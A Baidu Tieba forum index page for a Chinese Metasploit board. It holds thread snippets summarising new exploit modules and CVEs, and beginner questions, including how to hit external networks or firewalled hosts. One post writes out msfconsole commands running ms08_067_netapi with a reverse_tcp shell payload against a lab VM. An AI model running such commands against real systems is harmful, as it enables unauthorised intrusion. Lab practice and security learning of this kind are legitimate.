metasploit吧
关注: 2,749 贴子: 2,452

首屈一指的开源渗透框架

  • 0
    是不是没有安装vnc啊?是的话在windows系统中安装哪个vnc软件啊?
    沙漠之刘 10-21
  • 1
    使用auxiliary/server/capture/smb模块捕获认证信息
    黑色网络 10-20
  • 0
    更新6.0.11后少了1个exploit,2个auxiliary??
    notch1993 10-19
  • 0
    经核实吧主liyaweihesmz 未通过普通吧主考核。违反《百度贴吧吧主制度》第八章规定http://tieba.baidu.com/tb/system.html#cnt08 ,无法在建设 metasploit吧 内容上、言论导向上发挥应有的模范带头作用。故撤销其吧主管理权限。百度贴吧管理组
  • 4
    我有个大胆的想法 如果我把metasploitable放物理机上,这样是不是不需要较多的内存,只需要两台电脑就行 (因为我家不用的办公本比较多(3个),所以随便格式化一个就可以当靶机)
    容小狸 10-13
  • 0
    在该版本中,新增加了以下模块: (1)sap_igs_xmlchart_xxe模块:该模块利用SAP Internet Graphics Server(IGS) XMLCHART XXE中的漏洞(CVE-2018-2392和CVE-2018-2393)实施渗透测试。
    网络探... 10-10
  • 0
    在该版本中,新增加了以下模块: (1)maracms_upload_exec模块:该模块利用MaraCMS 7.5中的任意文件上传漏洞(CVE-2020-25042)可以执行任意命令。 (2)safari_in_operator_side_effect模块:该模块利用macOS 10.15.3中Safari的Bug,可以执行一个攻击载荷。 (3)anyconnect_lpe模块:该模块利用CVE-2020-3153漏洞实施渗透测试。 (4)cve_2020_1313_system_orchestrator模块:该模块利用CVE-2020-1313漏洞实施渗透测试。 (5)enum_vyos模块:枚举VyOS设备信息。 (6)windows_secrets_dump模块:该模块
  • 1
    怎么更新到最新的metasploit,命令行的,手机
  • 0
    在该版本中,新增加了以下模块: (1)artica_proxy_rce模块:该模块用于Artica proxy绕过认证。 (2)jenkins_cli_deserialization模块:该模块利用 Jenkins CLI 远程组件漏洞(CVE-2017-1000353)实施渗透测试。 (3)tp_link_ncxxx_bonjour_command_injection模块:该模块利用TP-Link Cameras命令注入漏洞(CVE-2020-12109)实施渗透。其中,支持该漏洞的型号有NC200、NC220、NC230、NC250、NC260和NC450。 (4)vyos_restricted_shell_privesc模块:该模块利用命令注入漏洞实施渗透测试。 (5)cve_2020_1048_pr
  • 3
    求大神帮助,试过好几台win7都是这样,没有永恒之蓝补丁,也没开防火墙
  • 0
    在该版本中,新增加了以下模块: (1)mida_solutions_eframework_ajaxreq_rce模块:该模块利用Mida Solutions eFramework中的命令行注入漏洞实施渗透测试。 (2)exchange_ecp_dlp_policy模块:该模块利用CVE-2020-16875漏洞实施渗透测试。 (3)enum_f5模块:该模块用来收集设备信息。 (4)tccbypass模块:该模块利用CVE-2020-9934漏洞实施渗透。其中,存在该漏洞的系统版本为OSX 10.15.5。 (5)enum_hyperv_vms模块:该模块用来枚举Hyper-V主机信息。
  • 0
    在该版本中,新增加了以下模块: (1)cfprefsd_race_condition模块:该模块可以利用 CVE-2020-9839漏洞实施渗透。 (2)dnsadmin_serverlevelplugindll模块:该模块可以利用Windows中的DNS服务来提升权限。 (3)modbus_banner_grabbing模块:该模块可以用来收集Modbus标识信息。 增强了以下功能: (1)为Python Meterpreter添加了代理认证支持。 (2)smb_version扫描模块使用ruby <= 2.5版本进行编译。 (3)在搜索模块结果中,支持使用info <search_index>查看模块详细信息。 (4)
  • 0
    在该版本中,新增加了如下模块: (1)sqlite_lab模块:该模块将利用CVE-2017-8835漏洞实施渗透。 修复的Bug: (1)缩短了msfvenom运行时间。当使用msfvenom创建攻击载荷时,仅加载相关的一套模块。 (2)修复了使用db_import导入zip文件的错误。 增强了以下功能: (1)当使用enum_patches模块搜集信息时,输出的信息包括KB(补丁)安装的日期。、 (2)在zip_slip漏洞利用模块中,支持生成ZIP文件。 (3)当使用shell时,将检测Python3和bash。 (4)更新了smb_enum_gpp模
  • 0
    在该版本中,增加了以下模块: (1)CVE-2020-16137模块:该模块允许攻击者修改SSH管理员认证为任何值。 (2)CVE-2020-16138模块:该模块主要利用CVE-2020-16138漏洞实施拒绝服务攻击。 (3)CVE-2020-16139模块:该模块利用CVE-2020-16139漏洞实施拒绝服务攻击。 (4)ldap_hashdump模块:该模块通过匿名或认证监听来收集LDAP数据。 增强了以下功能: (1)转换功能后,重新加载模块。当在模块内没有出现选项时,可以设置features set RHOST_HTTP_URL_false参数。然后,重新加
  • 0
    exploit是对漏洞进行利用的。漏洞不同,exploit不同。而payload是利用成功后执行的操作。这类操作都比较类似,所以就少了很多。
  • 2
    各位老哥,msf怎么渗透外网?只能通过远控木马吗?比如17-010漏洞可以外网直接拿shell吗?
  • 0
    在该版本中,新增加了如下模块: (1)safari_jit模块:该模块可以利用iPhone 4 iOS 7.1.2中的漏洞实施渗透测试。 (2)apache_ofbiz_deserialiation模块:该模块可利用Apache OFBiz XML-RPC Java反序列化漏洞(CVE-2020-9496)实施渗透测试。 (3)geutebruck_testaction_exec模块:该模块可利用Geutebruck G-CAM漏洞(CVE-2020-16205)实施渗透测试。 (4)dlink_central_wifimanager_rce模块:该模块可利用RCE漏洞(CVE-2019-13372)实施渗透测试。 (5)arista_config模块:该模块用来导入Arista切换配置信
  • 3
    萌新出初来贵吧,刚玩kali msf有没有人知道win10漏洞呀,大哥们
  • 1
    测试连接自己路由器内的另一部靶机,系统是win7 sp1,试过用17-010连接不上,新的2020的几个payload 也连不上,用nmap扫描显示135 139 445都开放 用ack扫描显示所有端口未连接,应该是开了防火墙,有路由器管理权,路由器的防火墙全部关闭了,请问这种情况下要用什么方式去攻击?谢谢各位大神。
  • 1
    在该版本中,新增加了如下模块: (1)vbulletin_widget_template_rce模块:该模块利用vBulletin 5.x漏洞(CVE-2020-7373)远程执行命令。 (2)jupyter_login模块:该模块用于Jupyter Notebooks登录扫描。 增强了以下模块功能: dyn_dns_update模块运行DNS服务工作在不同端口。 修复了以下Bug: (1)修复了enum_dns模块执行识别。 (2)在DNS SRV解析中跳过了CNAME记录。 (3)更新了dyn_dns_update模块。 (4)修复了Networking脚本 w/o DB。 (5)修复了每个主机持续时间不相等的模块的扫
  • 9
    靶机:虚拟机win7 x64 专业版 nat网络 IP:192.168.233.128(新安装) 攻击机:虚拟机Kali Linux nat网络 IP:192.168.233.129 靶机与虚拟机双向ping通,nmap检测靶机445端口开放 命令: use windows/smb/ms08_067_netapi set PAYLOAD windows/shell/reverse_tcp set RHOST 192.168.233.128 set LHOST 192.168.233.129 最后检查配置: Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.233.128 yes The target address RPORT 445 yes The SMB service port (TCP) SMBPIPE BR
    qpzm369852 8-19
  • 1
    payload在点击前,需要攻击端use multi/handle并exploit,等待目标端的连接。如果目标端点击了payload,但攻击端还没有exploit操作,那么10秒后,这个payload就失效了。 请问各位大佬,有没有办法让目标端的payload点击后,一直尝试连接攻击端啊?而不是过10秒就不连接了。如果能一直连接攻击端,那么攻击端就可以随时exploit来接受对方连接,不必先exploit进行等待了。
  • 22
    小白求助手机termux攻击好几个地址都是这样的
  • 0
    在该版本中,新增加了两个模块。如下所示: (1)zentao_pro_rce模块:利用ZenTao Pro 8.8.2版本的漏洞远程执行任何代码。 (2)cve_2020_6287_ws_add_user模块:利用CVE-2020-6278漏洞实施渗透测试。 增强和改进了以下功能: (1)为vmware_vcenter_vmdir_ldap模块添加了LDAPS支持,并且更新了该模块。 (2)加强了check模块行为。当一个有效的选项丢失check方法时,预先给出警告。 (3)添加哈希捕获功能到auxiliary/gather/vmware_vcenter_vmdir_ldap模块。 (4)改进了exploit/linux/http/f5_b
  • 58
    完全打不开那个窗口,等多久都没用
  • 1
    小白想请问怎么在kali中更新Metasploit,目前的版本是metasploit v4.12.22-dev
  • 2
    我在kali上试了一下,ms12-020,最后一个run时提示rdp服务不可达,但我用nmap -P命令检测端口是开启的,我在win7靶机上检查了3389服务也是开着的,我看了很久也没解决,有大哥可以帮帮我看看吗,目前只运行成功过一次蓝屏攻击,我换个操作系统蓝屏攻击就可以完美运行,不知道是什么原因,有大哥可以帮我看看吗
  • 1
    在该版本中,新增加了两个模块。如下所示: (1)pandora_fms_events_exec模块:利用Pandora FMS漏洞(CVE-2020-13851)可以远程执行任意命令。其中,存在漏洞的系统版本为Pandora FMS 7.0 NG 742,7.0NG 743和7.0 NG 744。 (2)plex_unpickle_dict_rce模块:利用Windows中的Plex rce漏洞(CVE-2020-5741)实施渗透。 增加和改进了以下功能: (1)改进了post/windows/gather/checkvm模块。该模块的行数被减数了30%,并且registry_enumkeys()和session.sys.process.get_processes()模块的执行时间也被缩短了。 (2
  • 0
    在该版本中,增加了以下模块: (1)f5_bigip_tmui_rce模块:该模块利用F5 BIG-IP漏洞来获取Unix root Shell。 (2)opensis_chain_exec模块:该模块利用OpenSIS 7.4之前的版本漏洞,可以执行任意PHP代码。 (3)fortimail_login_bypass_detection模块:利用FortiMail未认证漏洞可绕过登陆。 (4)springcloud_traversa12模块:该模块利用未认证目录遍历漏洞(CVE-2020-5410)实施渗透测试。其中,该漏洞存在Spring Cloud Config版本 2.2.x到2.2.3和2.1.x到2.1.9或更早的版本中。
  • 0
    在该版本中,增加了以下模块: (1)cve_2020_13160_anydesk模块:利用CVE-2020-13160漏洞(RCE in AnyDesk GUI)实施渗透测试。 (2)atutor_upload_traversal模块:利用ATutor 2.2.4漏洞实现目录遍历。 (3)bolt_authenticated_rce模块:利用Bolt CMS 3.7.0漏洞可以以root用户执行任意命令。 (4)netgear_r6700_pass_reset模块:该模块利用upnpd(/usr/sbin/upnpd)进程的缓冲区溢出漏洞实施渗透测试。 增强了以下功能: (1)添加了ForceExploit高级选项,允许用户覆盖模块的check结果。 (2)为msfv
  • 0
    在该版本中,新增加了以下模块: (1)trendmicro_websecurity_exec模块:该模块利用Trend Micro Web Security 6.5-SP2_Build_Linux_1852漏洞实施远程代码执行。 (2)agent_tesla_panel_rce模块:该模块利用命令注入漏洞实施攻击。 (3)inductive_ignition_rce模块:该模块利用Java序列化机制漏洞实施远程代码执行。 (4)anyconnect_path_traversal_lpe模块:利用Cisco AnyConnect Secure Mobility客户端漏洞实施渗透测试。 增强了以下功能: 更新错误日志API以另外获取一个错误对象,并更新代码库
  • 0
    在该版本中,新增加了以下模块: (1)cayin_cms_ntp 模块:利用Cayin xPost和CMS漏洞获取root/SYSTEM shell。 (2)zivif_ipcheck_exec模块:利用Zivif漏洞(CVE-2017-17106)可以实现远程执行命令。 (3)gog_galaxyclientservice_privesc模块:用来实现GOG Galaxy 客户端权限提升。 (4)arista_tacplus_shell模块:利用CVE-2020-9015漏洞实施渗透。 增强了以下模块: (1)auxiliary/gather/shodan_honeyscore:在该模块中增加了检查Shodan API Key功能。
  • 0
    在该版本中,增加了以下模块: (1)cisco_ucs_cloupia_script_rce模块:利用CVE-2020-3243/ZDI-20-540漏洞实施渗透。 (2)linuxki_rce模块:利用LinuxKI Toolset v6.0-1或更早版本中的漏洞实施远程代码执行攻击。其中,该漏洞CVE编号为CVE-2020-7209。 (3)cve_2020_0787_bits_arbitrary_file_move模块:利用CVE-2020-0787漏洞实施渗透。其中,该漏洞在Windows 10 v1909 x64和x86中验证成功。 (4)qnap_lfi模块:利用CVE 2019-7192 - CVE 2019-7195漏洞实施渗透。其中,该模块允许用户读取/etc/shadow或SSH私钥
  • 7
    运行撒旦出现以下错误是什么原因
    Mrd 6-10
  • 0
    在该版本中,新增加了四个模块。如下所示: (1)vbulletin_getindexablecontent模块:该模块主要理由SQL注入漏洞(CVE-2020-12720)实施渗透测试。其中,该漏洞存在vBulletin 5.2.0-5.6.1版本。 (2)vbulletin_getindexablecontent_sqli模块:该模块用来搜集SQL数据库信息。 (3)wp_dnd_mul_file_rce模块:利用CVE-2020-12800漏洞实施渗透测试。 (4)weblogic_deserialize_badattr_extcomp模块:利用WebLogic中的Java deserialization漏洞(CVE-2020-2883)实施渗透测试。 增强了以下功能: (1)在exploit/osx/
  • 1
    在该版本中,新增加了以下模块: (1)dlink_dwl_2600_command_injection模块:用于DLINK DWL-2600漏洞注入。 (2)solr_velocity_rce模块:通过Velocity模板利用Apache Solr(版本<= 8.3.0)漏洞实施远程代码执行。 (3)ibm_tm1_unauth_rce模块:利用CVE-2019-4716漏洞(存在IBM PA/TM1中),允许未认证攻击者执行一个配置摘要。 (4)vmware_fusion_lpe模块:利用CVE-2020-3950漏洞(存在Fusion OSX系统)提示权限。 (5)dnn_cookie_deserialization_rce模块:利用DNN(DotNetNuke) Cookie序列化漏洞实施渗
    Mrd 6-7
  • 1
    Metasploit 5.0.81版本中,新增加了一个profiling工具。用户通过使用该工具,可以分析内存和CPU的使用情况。如果要使用profiling工具,则需要安装ruby-prof和ruby-memory-profiler工具。否则,生成CPU或内存报告时,将分别出现如下错误提示: `require': cannot load such file -- ruby-prof (LoadError)#生成CPU报告的错误提示 cannot load such file -- memory_profiler (LoadError)#生成内存报告的错误提示 安装ruby-prof工具。执行命令如下所示: apt-get install ruby-prof 安装ruby-memory-profiler工具。执
    Mrd 6-7
  • 0
    在虚拟机测试了下,发现xp下的防火墙开启后,无法ping到xp,也无法利用ms08_067_netapi进行渗透。关了防火墙可以成功。 开防火墙的xp,就没办法吗?
    286zcy 6-2
  • 0
    在该版本中,增加了以下模块: (1)synology_dsm_smart_exec_auth模块:利用Synology DSM <5.2-5967-5中认证root RCE(CVE-2017-15889)漏洞实施渗透。 (2)pihole_dhcp_mac_exec模块:利用Pi-Hole<4.3.3 DHCP静态地址RCE漏洞实施渗透测试。 (3)pihole_whitelist_exec模块:利用Pi-Hole<3.3 whitelist RCE漏洞实施渗透。 (4)plesk_mylittleadmin_viewstate模块:利用CVE-2020-13166漏洞实施渗透测试。 (5)synology_forget_passwd_user_enum模块:利用CVE-2017-9554漏洞枚举用户名。 (6)bind_tsig_badtime模块:利
  • 0
    在该版本中,新增加了以下模块: (1)weblogic_deserialize_badattrval模块:利用WebLogic服务器漏洞(CVE-2020-2555)实施渗透测试。其中,受影响的版本有WebLogic 12.1.3.0、12.2.1.3.0和12.2.1.4.0。 (2)pihole_blocklist_exec模块:利用Pi-Hole漏洞(CVE-2020-11108)实施渗透测试。其中,受影响的版本为Pi-Hole 4.3.2和4.4。 改进了以下模块: (1)当运行cmd_exec模块时,添加了标准输出错误测试。 (2)为辅助模块Actions添加了描述信息。 (3)添加了python本地stager。
  • 3
    我昨天重装了系统w7装成w10 要重新安装metaploit,但是安装的时候弹出这个,是不是安装包损坏啊 求贴友发个安装包拜托拜托(官网下几kb实在是太慢了),最好是百度网盘链接 蟹蟹~
  • 4
    就是延缓挺慢的,打了字之后感觉差不多要一秒他才会在屏幕上输出
  • 0
    在该版本中,新增加了以下模块: (1)auxiliary/gather/cloud_lookup模块:测试服务器和Web站点的安全性。 (2)druva_insync_insynccphwnet64_rcp_type_5_priv_esc 模块:利用 CVE-2019-3999漏洞,提升本地用户权限。 (3)saltstack_salt_root_key模块:利用 CVE-2020-11652漏洞实施渗透。 (4)netsweeper_webadmin_unixlogin模块:利用Netsweeper漏洞实施渗透测试。 改进了以下模块: (1)添加了Post::Windows::Services.service_exists?方法为Post::Windows::Services。 (2)为每个模块添加了SRVHOST参数,用来

  • 发贴红色标题
  • 显示红名
  • 签到六倍经验

赠送补签卡1张,获得[经验书购买权]

扫二维码下载贴吧客户端

下载贴吧APP
看高清直播、视频!

本吧信息 查看详情>>

会员: 渗透人员

目录: 计算机软件